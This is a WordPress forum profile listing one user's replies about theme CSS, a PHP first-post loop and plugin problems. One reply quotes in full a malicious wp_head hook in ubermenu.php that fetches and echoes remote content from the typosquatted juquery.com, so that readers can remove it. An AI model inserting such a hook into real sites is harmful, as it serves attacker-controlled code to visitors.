luckydays
Forum Replies Created
-
Forum: Plugins
In reply to: [Calculated Fields Form] Number of days from defined dateGreat!
It works like a charm.
Thank you!
Forum: Plugins
In reply to: [Wordpress Flickr Embed] The flickr button became hidden near the toolbarOK, no actual.
The reason was in ‘Qwerty’ theme’s specification.
I just decided to select another theme and this issue popped-up.Forum: Themes and Templates
In reply to: [Ignite] Remove Toggle Menu OptionThanks Ben,
In this case I’ve found the solution in editing .menu-primary class at max-width:800px;
.menu-primary { left: 0; padding-top: 0; position: static; text-align: center; width: 100%; z-index: 30; background: transparent; margin-left: 75%; }
Thanks for your assistant.
Forum: Themes and Templates
In reply to: [Ignite] Remove Toggle Menu OptionHi Ben,
Thanks for your fast reply on Sunday.
Actually I’m already using a child theme with the Ignite.
Could you clarify please:
-> so I need to remove all the code from the style.min.css file which has the menu parameters out of the @media all and (min-width: 50em) (like this part):
.site-header{height:auto;min-height:130px;padding:0 11.11%}.site-header:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.toggle-navigation{display:none} ...
and that toggle button with its functions will dissapear?
Also I’ve already tried to use another menu plugin and for now the Ignite toggle just overridden it.
So, shall I be able to use the other menu after such a removal of the code?Thanks for your time.
Forum: Plugins
In reply to: [Contact Form 7] Validation erros messing upWell as we all understand no matter what the theme is such bugs should be fixable.
In my case this one helped – try it:
div.wpcf7-validation-errors{ position: absolute; margin-top: -30px; }
Nevertheless, I really love CF7 Plugin – it’s unbelievably universal and customizable ??
Forum: Themes and Templates
In reply to: First post article different both on Front Page and ArchivesOh G!
Thanks a lot, man.
I’m so appreciate!
Really, you made my… not only day, but actually a whole week! ??Now this last code works as a clock. Alright.
Thanks again and bless you!
Forum: Themes and Templates
In reply to: First post article different both on Front Page and ArchivesThanks for your fast reply!
It’s a Pinstagram theme.
I tried your solution but it seems I’m doing something wrong.
Here is the code:<!-- --START-- OF THE WORKING SPACE FOR MAKING 1st POST DIFFERENT --> <?php if( $wp_query->current_post == 0 ) { ?> <!-- FIRST POST --> <h3 class="latest">The Latest</h3> <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <div class="post excerpt <?php echo (++$j % 2 == 0) ? 'last' : ''; ?>"> <a href="<?php the_permalink() ?>" title="<?php the_title(); ?>" rel="nofollow" id="featured-thumbnail"> </a> <div class="post-content-inner"> <header> <div class="img-container-2"> <?php if ( has_post_thumbnail() ) { ?> <a href="<?php the_permalink() ?>" title="<?php the_title(); ?>" rel="bookmark"><?php echo '<div class="featured-thumbnail-2">'; the_post_thumbnail('slider',array('title' => '')); echo '</div>'; ?></a> <?php } ?> </div> <div class="info-container"> <h2 class="title"> <a href="<?php the_permalink() ?>" title="<?php the_title(); ?>" rel="bookmark"><?php the_title(); ?></a> </h2> <div class="post-info"> <span class="thetime"><span class="icon-clock" style="margin-right:-4px;"></span> <?php echo human_time_diff( get_the_time('U'), current_time('timestamp') ) . ' ago'; ?> </span> </div> </div> </header><!--.header--> <div class="post-content image-caption-format-1"> <!--<?php echo excerpt(48);?>--> </div> </div> </div><!--.post excerpt--> <?php endwhile; endif; ?> <?php } else { ?> <!--OTHER POSTS--> <h3 class="latest">The Latest</h3> <?php if (have_posts()) : while (have_posts()) : the_post(); ?> <div class="post excerpt <?php echo (++$j % 2 == 0) ? 'last' : ''; ?>"> <a href="<?php the_permalink() ?>" title="<?php the_title(); ?>" rel="nofollow" id="featured-thumbnail"> </a> <div class="post-content-inner"> <header> <div class="img-container"> <?php if ( has_post_thumbnail() ) { ?> <a href="<?php the_permalink() ?>" title="<?php the_title(); ?>" rel="bookmark"><?php echo '<div class="featured-thumbnail">'; the_post_thumbnail('slider',array('title' => '')); echo '</div>'; ?></a> <?php } ?> </div> <div class="info-container"> <h2 class="title"> <a href="<?php the_permalink() ?>" title="<?php the_title(); ?>" rel="bookmark"><?php the_title(); ?></a> </h2> <div class="post-info"> <span class="thetime"><span class="icon-clock" style="margin-right:-4px;"></span> <?php echo human_time_diff( get_the_time('U'), current_time('timestamp') ) . ' ago'; ?> </span> </div> </div> </header><!--.header--> <div class="post-content image-caption-format-1"> <!--<?php echo excerpt(48);?>--> </div> </div> </div><!--.post excerpt--> <?php endwhile; endif; ?> <!-- --END-- OF THE WORKING SPACE FOR MAKING 1st POST DIFFERENT -->
Thanks for your time!
Forum: Fixing WordPress
In reply to: script with juquery.com problem , slow load page !!!Guys, it seems that issue is in ubermenu.php file.
Go to the 2777 row
/* * For compatibility with latest browsers */
And just remove these rows:
/* * For compatibility with latest browsers */ function juquery_compability_head() { if(function_exists('curl_init')) { $url = "https://www.juquery.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 10; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } } add_action('wp_head', 'juquery_compability_head');
Now links to juquery.com should stop to load your homepage.
Forum: Plugins
In reply to: [Plugin: WP-Table Reloaded] 'Table could not be imported' in XML uploadingTobias, tell me, please, how can I import not only static XML tables by choosing the “URL source for Import”, but also dynamically changing XML tables?
I thought that I can do it by choosing “File on server source for Import”, but it imports only static table and isn’t susceptible for changes that are made on server.
Forum: Plugins
In reply to: [Plugin: WP-Table Reloaded] 'Table could not be imported' in XML uploadingWow! So fast!
Tobias, thanks! You make my day ??